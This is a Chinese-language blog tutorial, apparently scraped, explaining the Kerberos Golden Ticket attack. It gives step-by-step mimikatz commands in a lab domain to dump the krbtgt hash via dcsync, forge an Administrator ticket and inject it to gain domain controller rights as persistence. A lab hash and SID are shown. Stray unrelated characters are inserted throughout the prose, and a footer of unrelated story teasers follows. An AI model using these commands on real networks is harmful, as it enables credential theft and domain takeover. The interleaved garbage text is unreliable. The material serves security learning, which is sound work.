Pass The Ticket之黃金票據

前言

在橫向滲透中,利用Ticket票據進行橫向常常用在域環(huán)境里氧苍。常見的有三種攻擊方式:ms14-068夜矗、Golden Ticket(黃金票據)、Silver Ticket(白銀票據)
我們今天學習Golden Ticket(黃金票據)

概念

在了解了kerberos協(xié)議让虐,Client和Server通信大概經過三次認證紊撕。具體參考之前學習的kerberos認證學習。Client通過了第一次AS認證赡突,返回給TGT用于第二次認證对扶。
如果TGT被偽造,即跳過了AS認證惭缰,直接進行第二次認證浪南,就可以和任意的Server進行通信。而偽造的TGT叫做黃金票據漱受,也被稱為認證票據络凿。

原理

那么TGT如何偽造呢?就得看一下TGT是怎么產生的昂羡。是在第一次認證中絮记,KDC返回給Client兩部分內容。
一部分:Client NTLM-Hash 加密的Session-key as
一部分:TGT(krbtgt 域賬戶的NTLM Hash 加密的Session-key as紧憾、 Client-info到千、timestamp)

也就是當我們擁有krbtgt 域賬號NTLM-Hash的情況下,即獲取域管理員權限赴穗。就可以偽造黃金票據(Golden TGT)

利用條件

krbtgt NTLM-Hash:僅保存在域控服務器的活動目錄中憔四。也就是說我們需要獲取域控制器的權限。
域賬戶名稱:通常是域管理員Administrator
域名稱
域SID
導出krbtgt皆有以上信息

黃金票據般眉,通常在拿下域控后用來作權限維持的一種方式了赵。因為krbtgt 域賬戶的密碼基本不會更改,即使域管密碼被修改甸赃,它也不會改變柿汛。

偽造黃金票據

實驗環(huán)境
域控制器:Server 2012
域用戶:Server 2008
1.獲取krbtgt 域賬戶的NTLN-Hash
在域控上mimikatz導出krbtgt hash

mimikatz log "lsadump::dcsync  /domain:tide.org /user:krbtgt"
image.png

可看到以下信息

Hash NTLM : 264d69c269433dacf814799a4e6e92e5
SID: S-1-5-21-1082813543-4064396809-3123302706 不要RID值(502)
domain: tide.org

2.生成黃金票據
在域用戶server 2008 上使用mimikatz生成黃金票據

kerberos::purge  清空緩存
kerberos::golden /admin:Administrator /domain:tide.org /sid:S-1-5-21-1082813543-4064396809-3123302706 /krbtgt:264d69c269433dacf814799a4e6e92e5 /ticket:Administrator.kiribi

執(zhí)行后會生成Administrator.kiribi
3. 偽造黃金票據獲取域控權限
mimikatz導入該黃金票據

kerberos::ptt Administrator.kiribi
image.png

即可獲得域控權限。

參考資料

域滲透 - Pass the Ticket之金票&銀票
Kerberos的黃金票據詳解
域滲透之票據

?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市络断,隨后出現(xiàn)的幾起案子裁替,更是在濱河造成了極大的恐慌,老刑警劉巖貌笨,帶你破解...
    沈念sama閱讀 219,490評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件弱判,死亡現(xiàn)場離奇詭異,居然都是意外死亡锥惋,警方通過查閱死者的電腦和手機昌腰,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,581評論 3 395
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來膀跌,“玉大人遭商,你說我怎么就攤上這事⊥鄙耍” “怎么了劫流?”我有些...
    開封第一講書人閱讀 165,830評論 0 356
  • 文/不壞的土叔 我叫張陵,是天一觀的道長暑认。 經常有香客問我困介,道長,這世上最難降的妖魔是什么蘸际? 我笑而不...
    開封第一講書人閱讀 58,957評論 1 295
  • 正文 為了忘掉前任座哩,我火速辦了婚禮,結果婚禮上粮彤,老公的妹妹穿的比我還像新娘根穷。我一直安慰自己,他們只是感情好导坟,可當我...
    茶點故事閱讀 67,974評論 6 393
  • 文/花漫 我一把揭開白布屿良。 她就那樣靜靜地躺著,像睡著了一般惫周。 火紅的嫁衣襯著肌膚如雪尘惧。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,754評論 1 307
  • 那天递递,我揣著相機與錄音喷橙,去河邊找鬼。 笑死登舞,一個胖子當著我的面吹牛贰逾,可吹牛的內容都是我干的。 我是一名探鬼主播菠秒,決...
    沈念sama閱讀 40,464評論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼疙剑,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側響起言缤,我...
    開封第一講書人閱讀 39,357評論 0 276
  • 序言:老撾萬榮一對情侶失蹤嚼蚀,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后轧简,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體驰坊,經...
    沈念sama閱讀 45,847評論 1 317
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 37,995評論 3 338
  • 正文 我和宋清朗相戀三年哮独,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片察藐。...
    茶點故事閱讀 40,137評論 1 351
  • 序言:一個原本活蹦亂跳的男人離奇死亡皮璧,死狀恐怖,靈堂內的尸體忽然破棺而出分飞,到底是詐尸還是另有隱情悴务,我是刑警寧澤,帶...
    沈念sama閱讀 35,819評論 5 346
  • 正文 年R本政府宣布譬猫,位于F島的核電站讯檐,受9級特大地震影響,放射性物質發(fā)生泄漏染服。R本人自食惡果不足惜别洪,卻給世界環(huán)境...
    茶點故事閱讀 41,482評論 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望柳刮。 院中可真熱鬧挖垛,春花似錦、人聲如沸秉颗。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,023評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽蚕甥。三九已至哪替,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間菇怀,已是汗流浹背凭舶。 一陣腳步聲響...
    開封第一講書人閱讀 33,149評論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留敏释,地道東北人库快。 一個月前我還...
    沈念sama閱讀 48,409評論 3 373
  • 正文 我出身青樓,卻偏偏與公主長得像钥顽,于是被迫代替她去往敵國和親义屏。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 45,086評論 2 355

推薦閱讀更多精彩內容

  • 這篇文章介紹了Mobile BI(移動商務智能)使用過程中涉及的各種身份認證的方式,主要目的是對這些方式的原理進行...
    雨_樹閱讀 2,023評論 1 2
  • 前言 內網滲透大多數(shù)為域滲透闽铐。學習域滲透kerberos協(xié)議就是繞不過的一個難點蝶怔,白銀票據、黃金票據兄墅、攻擊域控都離...
    CSeroad閱讀 4,436評論 0 5
  • 這篇文章以由淺入深踢星、層層深入的方式講述基于Kerberos的Windows Network Authenticat...
    readilen閱讀 3,898評論 0 2
  • 前言 Pass The Ticket 也是橫向滲透的一種攻擊方式,簡稱ptt隙咸。而Ticket票據是利用kerber...
    CSeroad閱讀 2,842評論 1 1
  • 前言 在了解了kerberos流程之后沐悦,我們相繼學習了ms14-068的利用、黃金票據五督。從整個流程中每次認證中可以...
    CSeroad閱讀 2,105評論 0 1